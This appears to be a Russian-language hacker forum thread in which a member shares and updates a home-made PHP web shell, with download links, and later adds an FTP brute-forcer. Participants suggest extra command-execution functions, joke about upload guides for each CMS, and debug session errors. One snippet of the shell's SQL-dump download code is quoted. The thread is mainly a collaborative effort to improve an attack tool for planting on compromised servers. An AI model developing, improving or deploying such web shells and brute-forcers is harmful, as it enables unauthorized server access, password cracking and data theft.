в общем тут традиция делать шеллы , а я так посмотрел ни разу не сделал =\
естественно онли пост
http://netsec.ru/gb_old/src/shell.phps

похож на шелл ак74
а по делу...
что за тёмносерый текст на светлосером фоне???
пощади глаза

В окне листинга неплохо бы сделать выравнивание по колонкам вывода .. сейчас просмотр листинга немного затруднен )
алиасы... мм.. да в принципе не вижу смысла искать конфиг.инк.пхп ))) + ты еще и по маске конфиги ищещь..

ну вообще то я не ищу
просто добавил из р57 =\
как и шелами я тоже не пользуюсь)
про цвета букв - имхо нормально видно

фигово в сейфмоде работает, и в винде вообще
Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode

Так если safe-mode, то max_execution_time(0);

молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))

молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))
норм) поюзаем..

да-да, по заливке для каждого форума/цмс, а то че с ним делать :confused: :p

Обновил.)

Обновил.)


Так получше будет.

GreenBear, если сейф мод включен, то будет не корректно пахать
Напиши еще так max_execution_time(0);

Первое с чем я столкнулся, то что шелл у тебя в UTF-8, а сервер netsec'a отвечает:Content-Type: text/html; charset=windows-1251
if($_POST['download']){
header('Content-Length:'.filesize('/tmp/'.$_POST['download'].'.sql').' ');
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename={$_POST['download']}.sql");
readfile('/tmp/'.$_POST['download'].'.sql');
die();
}
$_POST['dir'] ? $dir = $_POST['dir'] : $dir = getcwd();
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);Как насчёт убрать слэши из переменных до использования последних?

хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu

ИМХО, яркий действительно глаза напрягает.

Про js, который не нужен я ничего говорить не буду.))

Кстати, не пробовал его проинклудить не первым? Как выглядит?

А вот вопрос, уже давно меня интересует:
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?

Как насчёт убрать слэши из переменных до использования последних?
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )
хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu
если чесно то тоже не вижу смысла.
Про js, который не нужен я ничего говорить не буду.))
мне так удобнее делать =\
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?
автоматом.

ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )Нет, чтоб не получались вот такие пути "C:\\\\\\\\www\\\\\\\\http\\\\\\\\"

если чесно то тоже не вижу смысла.Просто некоторые функции бывают отключены, а про другие забывают.

ну где выключен попен, там и все другие типа систем, ексек тоже =\ в основном. добавить не сложно конечно, но смысла не вижу)

Обновление.
Добавлен фтп брут
качать (http://gb.netsec.ru/src/shell.phps) там же

ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?

ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?
нет, сайт не доступен Гринбира...

http://netsec.ru/gb_old/src/shell.phps

спасибо молодец, пользуюсь ак57, но твой тоже придёться затестить )))

+

меня почему-то постоянно куда ненажимаю бросает на страничку с логином и пассом .Набираю test и всё ровно.
Тест провожу на винде
И на хосте под линухой такая же ботва.Хост на агаве

cними авторизацию

// username, password, auth
// $info['username'] = 'test';
// $info['password'] = 'test';
// $info['auth'] = true;

я просто закоментировал , но теперь он просто ничего не делает

закоментируй error_reporting(0);
и посмотри чего пишет ..
я хз чего у тебя там не работает.

Warning: session_start() [function.session-start]: Cannot
send session cookie - headers already sent by (output
started at C:\AppServ\www\she.php:1) in
C:\AppServ\www\she.php on line 16

Warning: session_start() [function.session-start]: Cannot
send session cache limiter - headers already sent (output
started at C:\AppServ\www\she.php:1) in
C:\AppServ\www\she.php on line 16



-----------------------------------------------

вот инфа по машине
Server info:
OS: , Software: Apache/2.2.2 (Win32) PHP/5.1.4
PHP Version: 5.1.4, Safe mode: Off
Disabled Functions: false
MySQL: On, MSSQL: Off, Oracle: Off


-------------------------------

16 строчка


session_start();

пробелов перед <?php
не стоит?

он кстате под виднус не предназначен )

пробелов перед <?php
не стоит?

А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Раз он предназначен под никсы, значит буду тэстить под никсы.А под винду буду другой шел использовать.
Всё ровно ГринБир молодец,спасибо.

хидеры не могу быть посланы после вывода кода страницы.

2ultimatum

У многих редакторов при сохранении в юникоде есть манера впихивать в начало файла три злочастных байта, которые могут подпортить жизнь программисту.

А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Подучи спецификации HTTP, тогда поймешь, почему, выдав хоть один байт в теле ответа, апач больге не может добавить ни один хидер, в данном случае set-cookie.